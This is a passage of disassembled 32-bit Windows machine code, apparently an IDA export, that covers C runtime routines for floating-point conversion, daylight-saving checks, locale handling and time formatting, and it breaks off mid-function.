; [0000015A BYTES: COLLAPSED FUNCTION __hw_cw. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A7 BYTES: COLLAPSED FUNCTION __abstract_sw. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION __ZeroTail. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A8 BYTES: COLLAPSED FUNCTION __IncMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000DB BYTES: COLLAPSED FUNCTION __RoundMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004C BYTES: COLLAPSED FUNCTION __CopyMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __FillZeroMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000037 BYTES: COLLAPSED FUNCTION __IsZeroMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000EC BYTES: COLLAPSED FUNCTION __ShrMan. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000242 BYTES: COLLAPSED FUNCTION __ld12cvt. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4338D0 proc near ; CODE XREF: sub_4339D0+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_455678
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call __ld12cvt
add esp, 0Ch
pop ebp
retn
sub_4338D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4338F0 proc near ; CODE XREF: sub_433A50+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_455690
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call __ld12cvt
add esp, 0Ch
pop ebp
retn
sub_4338F0 endp
; ---------------------------------------------------------------------------
align 10h
; [000000BF BYTES: COLLAPSED FUNCTION __ld12told. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4339D0 proc near ; CODE XREF: __fassign+14�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call ___strgtold12
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_4338D0
add esp, 8
mov esp, ebp
pop ebp
retn
sub_4339D0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000036 BYTES: COLLAPSED FUNCTION __atoldbl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433A50 proc near ; CODE XREF: __fassign+34�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call ___strgtold12
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_4338F0
add esp, 8
mov esp, ebp
pop ebp
retn
sub_433A50 endp
; ---------------------------------------------------------------------------
align 10h
; [000000FA BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000077 BYTES: COLLAPSED FUNCTION __fltout2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000162 BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __fptrap. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005B BYTES: COLLAPSED FUNCTION __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __CxxSetUnhandledExceptionFilter(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000011 BYTES: COLLAPSED FUNCTION __CxxRestoreUnhandledExceptionFilter(void). PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433E30 proc near ; CODE XREF: FindHandler(EHExceptionRecord *,EHRegistrationNode *,_CONTEXT *,void *,_s_FuncInfo const *,uchar,int,EHRegistrationNode *)+9E�p
; BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+77�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F64A4 ; IsBadReadPtr
test eax, eax
jz short loc_433E54
mov [ebp+var_4], 0
loc_433E54: ; CODE XREF: sub_433E30+1B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_433E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433E60 proc near ; CODE XREF: BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+89�p
; BuildCatchObject(EHExceptionRecord *,EHRegistrationNode *,_s_HandlerType const *,_s_CatchableType const *)+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F64A0 ; IsBadWritePtr
test eax, eax
jz short loc_433E84
mov [ebp+var_4], 0
loc_433E84: ; CODE XREF: sub_433E60+1B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_433E60 endp
; ---------------------------------------------------------------------------
align 10h
; [00000027 BYTES: COLLAPSED FUNCTION _ValidateExecute(int (*)(void)). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001E BYTES: COLLAPSED FUNCTION _abort. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop ebp
retn
; [0000003D BYTES: COLLAPSED FUNCTION ___tzset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001E BYTES: COLLAPSED FUNCTION __tzset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003AB BYTES: COLLAPSED FUNCTION __tzset_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002E BYTES: COLLAPSED FUNCTION __isindst. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_434320 proc near ; CODE XREF: __isindst+12�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_4556AC, 0
jnz short loc_434334
xor eax, eax
jmp loc_434616
; ---------------------------------------------------------------------------
loc_434334: ; CODE XREF: sub_434320+B�j
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
cmp ecx, dword_455740
jnz short loc_434354
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
cmp eax, dword_455750
jz loc_43451B
loc_434354: ; CODE XREF: sub_434320+20�j
cmp dword_4F49D8, 0
jz loc_4344D5
xor ecx, ecx
mov cx, word_4F4A78
test ecx, ecx
jnz short loc_4343C9
xor edx, edx
mov dx, word_4F4A86
push edx
xor eax, eax
mov ax, word_4F4A84
push eax
xor ecx, ecx
mov cx, word_4F4A82
push ecx
xor edx, edx
mov dx, word_4F4A80
push edx
push 0
xor eax, eax
mov ax, word_4F4A7C
push eax
xor ecx, ecx
mov cx, word_4F4A7E
push ecx
xor edx, edx
mov dx, word_4F4A7A
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 1
call _cvtdate
add esp, 2Ch
jmp short loc_43441A
; ---------------------------------------------------------------------------
loc_4343C9: ; CODE XREF: sub_434320+4C�j
xor edx, edx
mov dx, word_4F4A86
push edx
xor eax, eax
mov ax, word_4F4A84
push eax
xor ecx, ecx
mov cx, word_4F4A82
push ecx
xor edx, edx
mov dx, word_4F4A80
push edx
xor eax, eax
mov ax, word_4F4A7E
push eax
push 0
push 0
xor ecx, ecx
mov cx, word_4F4A7A
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 1
call _cvtdate
add esp, 2Ch
loc_43441A: ; CODE XREF: sub_434320+A7�j
xor ecx, ecx
mov cx, word_4F4A24
test ecx, ecx
jnz short loc_434482
xor edx, edx
mov dx, word_4F4A32
push edx
xor eax, eax
mov ax, word_4F4A30
push eax
xor ecx, ecx
mov cx, word_4F4A2E
push ecx
xor edx, edx
mov dx, word_4F4A2C
push edx
push 0
xor eax, eax
mov ax, word_4F4A28
push eax
xor ecx, ecx
mov cx, word_4F4A2A
push ecx
xor edx, edx
mov dx, word_4F4A26
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call _cvtdate
add esp, 2Ch
jmp short loc_4344D3
; ---------------------------------------------------------------------------
loc_434482: ; CODE XREF: sub_434320+105�j
xor edx, edx
mov dx, word_4F4A32
push edx
xor eax, eax
mov ax, word_4F4A30
push eax
xor ecx, ecx
mov cx, word_4F4A2E
push ecx
xor edx, edx
mov dx, word_4F4A2C
push edx
xor eax, eax
mov ax, word_4F4A2A
push eax
push 0
push 0
xor ecx, ecx
mov cx, word_4F4A26
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+14h]
push eax
push 0
push 0
call _cvtdate
add esp, 2Ch
loc_4344D3: ; CODE XREF: sub_434320+160�j
jmp short loc_43451B
; ---------------------------------------------------------------------------
loc_4344D5: ; CODE XREF: sub_434320+3B�j
push 0
push 0
push 0
push 2
push 0
push 0
push 1
push 4
mov ecx, [ebp+arg_0]
mov edx, [ecx+14h]
push edx
push 1
push 1
call _cvtdate
add esp, 2Ch
push 0
push 0
push 0
push 2
push 0
push 0
push 5
push 0Ah
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
push ecx
push 1
push 0
call _cvtdate
add esp, 2Ch
loc_43451B: ; CODE XREF: sub_434320+2E�j
; sub_434320:loc_4344D3�j
mov edx, dword_455744
cmp edx, dword_455754
jge short loc_434574
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_455744
jl short loc_434545
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_455754
jle short loc_43454C
loc_434545: ; CODE XREF: sub_434320+215�j
xor eax, eax
jmp loc_434616
; ---------------------------------------------------------------------------
loc_43454C: ; CODE XREF: sub_434320+223�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_455744
jle short loc_434572
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_455754
jge short loc_434572
mov eax, 1
jmp loc_434616
; ---------------------------------------------------------------------------
loc_434572: ; CODE XREF: sub_434320+238�j
; sub_434320+246�j
jmp short loc_4345B7
; ---------------------------------------------------------------------------
loc_434574: ; CODE XREF: sub_434320+207�j
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_455754
jl short loc_434590
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_455744
jle short loc_434597
loc_434590: ; CODE XREF: sub_434320+260�j
mov eax, 1
jmp short loc_434616
; ---------------------------------------------------------------------------
loc_434597: ; CODE XREF: sub_434320+26E�j
mov eax, [ebp+arg_0]
mov ecx, [eax+1Ch]
cmp ecx, dword_455754
jle short loc_4345B7
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
cmp eax, dword_455744
jge short loc_4345B7
xor eax, eax
jmp short loc_434616
; ---------------------------------------------------------------------------
loc_4345B7: ; CODE XREF: sub_434320:loc_434572�j
; sub_434320+283�j ...
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
imul edx, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, edx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
imul eax, 0E10h
add ecx, eax
imul ecx, 3E8h
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx+1Ch]
cmp edx, dword_455744
jnz short loc_434602
mov eax, [ebp+var_4]
cmp eax, dword_455748
jl short loc_4345FE
mov eax, 1
jmp short loc_434616
; ---------------------------------------------------------------------------
loc_4345FE: ; CODE XREF: sub_434320+2D5�j
xor eax, eax
jmp short loc_434616
; ---------------------------------------------------------------------------
loc_434602: ; CODE XREF: sub_434320+2CA�j
mov ecx, [ebp+var_4]
cmp ecx, dword_455758
jge short loc_434614
mov eax, 1
jmp short loc_434616
; ---------------------------------------------------------------------------
loc_434614: ; CODE XREF: sub_434320+2EB�j
xor eax, eax
loc_434616: ; CODE XREF: sub_434320+F�j
; sub_434320+227�j ...
mov esp, ebp
pop ebp
retn
sub_434320 endp
; ---------------------------------------------------------------------------
align 10h
; [000001F8 BYTES: COLLAPSED FUNCTION _cvtdate. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000DB BYTES: COLLAPSED FUNCTION ___init_time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000058F BYTES: COLLAPSED FUNCTION __get_lc_time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000030B BYTES: COLLAPSED FUNCTION __free_lc_time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002A6 BYTES: COLLAPSED FUNCTION ___init_numeric. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007D BYTES: COLLAPSED FUNCTION _fix_grouping. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000130 BYTES: COLLAPSED FUNCTION ___init_monetary. PRESS KEYPAD "+" TO EXPAND]
; [0000020D BYTES: COLLAPSED FUNCTION __get_lc_lconv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007D BYTES: COLLAPSED FUNCTION _fix_grouping_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000093 BYTES: COLLAPSED FUNCTION __free_lc_lconv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000003A0 BYTES: COLLAPSED FUNCTION unknown_libname_24. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435CD0 proc near ; DATA XREF: .data:004554F4�o
push ebp
mov ebp, esp
xor eax, eax
pop ebp
retn
sub_435CD0 endp
; ---------------------------------------------------------------------------
align 10h
; [0000003E BYTES: COLLAPSED FUNCTION _strcspn. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003A BYTES: COLLAPSED FUNCTION unknown_libname_26. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000200 BYTES: COLLAPSED FUNCTION ___get_qualified_locale. PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION _TranslateName. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BA BYTES: COLLAPSED FUNCTION _GetLcidFromLangCountry. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000324 BYTES: COLLAPSED FUNCTION LangCountryEnumProc(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000074 BYTES: COLLAPSED FUNCTION _GetLcidFromLanguage. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000011F BYTES: COLLAPSED FUNCTION LanguageEnumProc(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000045 BYTES: COLLAPSED FUNCTION _GetLcidFromCountry. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION CountryEnumProc(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002B BYTES: COLLAPSED FUNCTION _GetLcidFromDefault. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000009B BYTES: COLLAPSED FUNCTION _ProcessCodePage. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004F BYTES: COLLAPSED FUNCTION _TestDefaultCountry. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000087 BYTES: COLLAPSED FUNCTION _TestDefaultLanguage. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004D BYTES: COLLAPSED FUNCTION _IsThisWindowsNT. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000184 BYTES: COLLAPSED FUNCTION crtGetLocaleInfoA(x,x,x,x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000076 BYTES: COLLAPSED FUNCTION _LcidFromHexString. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000065 BYTES: COLLAPSED FUNCTION _GetPrimaryLen. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push 1
push 0
mov eax, [ebp+8]
push eax
call sub_436C80
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbkprint. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbkpunct. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbalnum. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbalpha. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbgraph. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION __ismbbprint. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbpunct. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __ismbbtrail. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003B BYTES: COLLAPSED FUNCTION __ismbbkana. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436C80 proc near ; CODE XREF: .text:00436B0B�p
; __ismbbkprint+B�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
and eax, 0FFh
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, byte_4F4D61[ecx]
and edx, [ebp+arg_8]
test edx, edx
jnz short loc_436CD4
cmp [ebp+arg_4], 0
jz short loc_436CBE
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, word ptr (__wctype+2)[eax*2]
and ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
jmp short loc_436CC5
; ---------------------------------------------------------------------------
loc_436CBE: ; CODE XREF: sub_436C80+27�j
mov [ebp+var_4], 0
loc_436CC5: ; CODE XREF: sub_436C80+3C�j
cmp [ebp+var_4], 0
jnz short loc_436CD4
mov [ebp+var_8], 0
jmp short loc_436CDB
; ---------------------------------------------------------------------------
loc_436CD4: ; CODE XREF: sub_436C80+21�j
; sub_436C80+49�j
mov [ebp+var_8], 1
loc_436CDB: ; CODE XREF: sub_436C80+52�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_436C80 endp
; ---------------------------------------------------------------------------
align 10h
; [00000073 BYTES: COLLAPSED FUNCTION __chsize. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000230 BYTES: COLLAPSED FUNCTION __chsize_lk. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___addl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AD BYTES: COLLAPSED FUNCTION ___add_12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION ___shl_12. PRESS KEYPAD "+" TO EXPAND]
; [00000063 BYTES: COLLAPSED FUNCTION ___shr_12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000013B BYTES: COLLAPSED FUNCTION ___mtold12. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000A1A BYTES: COLLAPSED FUNCTION ___strgtold12. PRESS KEYPAD "+" TO EXPAND]
off_437CBA dd offset loc_43737C ; DATA XREF: ___strgtold12+D5�r
dd offset loc_43741A
dd offset loc_4374D0
dd offset loc_43753B
dd offset loc_437653
dd offset loc_437785
dd offset loc_4377FB
dd offset loc_4378E0
dd offset loc_437882
dd offset loc_437933
dd offset loc_437AA3
dd offset loc_437A3F
off_437CEA dd offset loc_4374A9 ; DATA XREF: ___strgtold12+1F0�r
dd offset loc_437497
dd offset loc_4374A0
dd offset loc_4374BB
byte_437CFA db 0 ; DATA XREF: ___strgtold12+1EA�r
db 3
dd 1030300h, 4 dup(3030303h), 2030303h, 3030302h, 6 dup(3030303h)
dd 2030303h
db 2
dd offset loc_43762C ; DATA XREF: ___strgtold12+37C�r
dd offset loc_437623
dd offset loc_43763E
byte_437D41 db 0 ; DATA XREF: ___strgtold12+376�r
dw 2
dd 5 dup(2020202h), 1010202h, 7 dup(2020202h), 1010202h
off_437D7C dd offset loc_43775E ; DATA XREF: ___strgtold12+4AE�r
dd offset loc_437755
dd offset loc_437770
byte_437D88 db 0 ; DATA XREF: ___strgtold12+4A8�r
db 2, 0, 2
dd 5 dup(2020202h), 2010102h, 7 dup(2020202h), 0CC010102h
dd 3 dup(0CCCCCCCCh)
; [0000004F BYTES: COLLAPSED FUNCTION ___STRINGTOLD. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000516 BYTES: COLLAPSED FUNCTION _$I10_OUTPUT. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
push 0Ch
call __lock
add esp, 4
mov eax, [ebp+8]
push eax
call _getenv
add esp, 4
mov [ebp-4], eax
push 0Ch
call __unlock
add esp, 4
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000C6 BYTES: COLLAPSED FUNCTION _getenv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000121 BYTES: COLLAPSED FUNCTION __Getdays. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION __Getmonths. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000036E BYTES: COLLAPSED FUNCTION __Gettnames. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push 0
mov eax, [ebp+14h]
push eax
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
push eax
call sub_438A30
add esp, 14h
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438A30 proc near ; CODE XREF: .text:00438A25�p
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
push offset dword_4F4C48
call ds:dword_4F64BC ; InterlockedIncrement
cmp dword_4F4C44, 0
jz short loc_438A6E
push offset dword_4F4C48
call ds:dword_4F64B8 ; InterlockedDecrement
push 13h
call __lock
add esp, 4
mov [ebp+var_8], 1
jmp short loc_438A75
; ---------------------------------------------------------------------------
loc_438A6E: ; CODE XREF: sub_438A30+1E�j
mov [ebp+var_8], 0
loc_438A75: ; CODE XREF: sub_438A30+3C�j
cmp [ebp+arg_10], 0
jnz short loc_438A86
mov ecx, off_455F48
mov [ebp+var_10], ecx
jmp short loc_438A8C
; ---------------------------------------------------------------------------
loc_438A86: ; CODE XREF: sub_438A30+49�j
mov edx, [ebp+arg_10]
mov [ebp+var_10], edx
loc_438A8C: ; CODE XREF: sub_438A30+54�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
loc_438A92: ; CODE XREF: sub_438A30:loc_438B7E�j
cmp [ebp+var_C], 0
jbe loc_438B83
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [ebp+var_14], dl
cmp [ebp+var_14], 0
jz short loc_438AB2
cmp [ebp+var_14], 25h
jz short loc_438AB7
jmp short loc_438B11
; ---------------------------------------------------------------------------
loc_438AB2: ; CODE XREF: sub_438A30+78�j
jmp loc_438B83
; ---------------------------------------------------------------------------
loc_438AB7: ; CODE XREF: sub_438A30+7E�j
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
mov dword_4F4B20, 0
mov ecx, [ebp+arg_8]
movsx edx, byte ptr [ecx]
cmp edx, 23h
jnz short loc_438AE8
mov dword_4F4B20, 1
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
loc_438AE8: ; CODE XREF: sub_438A30+A3�j
mov ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_C]
push edx
lea eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
mov al, [edx]
push eax
call sub_438BC0
add esp, 14h
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
jmp short loc_438B7E
; ---------------------------------------------------------------------------
loc_438B11: ; CODE XREF: sub_438A30+80�j
mov edx, [ebp+arg_8]
xor eax, eax
mov al, [edx]
mov ecx, off_454E04
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_438B59
cmp [ebp+var_C], 1
jbe short loc_438B59
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_438B59: ; CODE XREF: sub_438A30+FC�j
; sub_438A30+102�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_8]
add ecx, 1
mov [ebp+arg_8], ecx
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
loc_438B7E: ; CODE XREF: sub_438A30+DF�j
jmp loc_438A92
; ---------------------------------------------------------------------------
loc_438B83: ; CODE XREF: sub_438A30+66�j
; sub_438A30:loc_438AB2�j
cmp [ebp+var_8], 0
jz short loc_438B95
push 13h
call __unlock
add esp, 4
jmp short loc_438BA0
; ---------------------------------------------------------------------------
loc_438B95: ; CODE XREF: sub_438A30+157�j
push offset dword_4F4C48
call ds:dword_4F64B8 ; InterlockedDecrement
loc_438BA0: ; CODE XREF: sub_438A30+163�j
cmp [ebp+var_C], 0
jbe short loc_438BB4
mov eax, [ebp+arg_0]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
jmp short loc_438BB6
; ---------------------------------------------------------------------------
loc_438BB4: ; CODE XREF: sub_438A30+174�j
xor eax, eax
loc_438BB6: ; CODE XREF: sub_438A30+182�j
mov esp, ebp
pop ebp
retn
sub_438A30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_438BC0 proc near ; CODE XREF: sub_438A30+CE�p
; sub_439390+486�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
movsx eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov ecx, [ebp+var_C]
sub ecx, 25h
mov [ebp+var_C], ecx
cmp [ebp+var_C], 55h
ja loc_439128
mov eax, [ebp+var_C]
xor edx, edx
mov dl, ds:byte_439189[eax]
jmp ds:off_43912D[edx*4]
loc_438BF3: ; DATA XREF: .text:0043915D�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4]
push eax
call __store_str
add esp, 0Ch
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438C15: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439131�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+18h]
mov edx, [ebp+arg_10]
mov eax, [edx+ecx*4+1Ch]
push eax
call __store_str
add esp, 0Ch
jmp loc_439128
; ---------------------------------------------------------------------------
loc_438C38: ; CODE XREF: sub_438BC0+2C�j
; DATA XREF: .text:00439161�o
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+10h]
